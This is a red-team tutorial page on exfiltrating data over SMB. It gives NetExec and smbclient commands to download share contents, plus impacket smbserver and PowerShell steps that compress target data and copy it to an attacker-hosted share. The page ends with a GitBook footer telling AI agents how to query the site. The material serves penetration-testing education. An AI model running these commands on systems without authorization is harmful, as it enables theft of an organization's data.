> For the complete documentation index, see [llms.txt](https://red.infiltr8.io/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://red.infiltr8.io/redteam/exfiltration/smb.md). # Exfiltration Over SMB ## Theory SMB (Server Message Block) exfiltration refers to the unauthorized extraction or transfer of data from a compromised network or system using SMB protocols. Attackers can leverage SMB to transfer sensitive or valuable information from an organization's network to an external location. ## Practice ### Exfiltrate Share's Content {% tabs %} {% tab title="NetExec" %} Tools like [NetExec](https://github.com/Pennyw0rth/NetExec) can be used to recursively download a SMB share's content. ```bash netexec smb $IP -u $USERNAME -p $PASSWORD -M spider_plus -o DOWNLOAD_FLAG=True MAX_FILE_SIZE=999999 ``` The previous command generates a json file with the list of accessible files in shares. We may use jq to parse this json output. ```bash cat 10.10.10.111.json | jq '. | map_values(keys)' ``` {% endtab %} {% tab title="smbclient" %} Tools like [smbclient](https://www.samba.org/samba/docs/current/man-html/smbclient.1.html) can be used to recursively download a SMB share's content. ```bash # In an smbclient interactive session recurse ON prompt OFF mget * ``` {% endtab %} {% endtabs %} ### Exfiltrate Data {% tabs %} {% tab title="Windows" %} To exfiltrate the data from the target, we can compress the data and transfer it via an SMB shared folder hosted on our attacking host. First, start a SMB server on your attacking host using [smbserver.py](https://github.com/fortra/impacket/blob/master/examples/smbserver.py) from impacket ```bash smbserver.py -smb2support /local/share/path ShareName -user veresk -password psswd ``` On the target, compress target data ```powershell Compress-Archive -Path /path/to/compress -DestinationPath exfi.zip ``` From the target, mount the share folder and copy files to it ```powershell # Mount the smb share net use Z: \\ATTACKING_IP\ShareName psswd /USER:veresk # Exfiltrate ZIP file copy exfi.zip Z:\ ``` {% endtab %} {% endtabs %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://red.infiltr8.io/redteam/exfiltration/smb.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.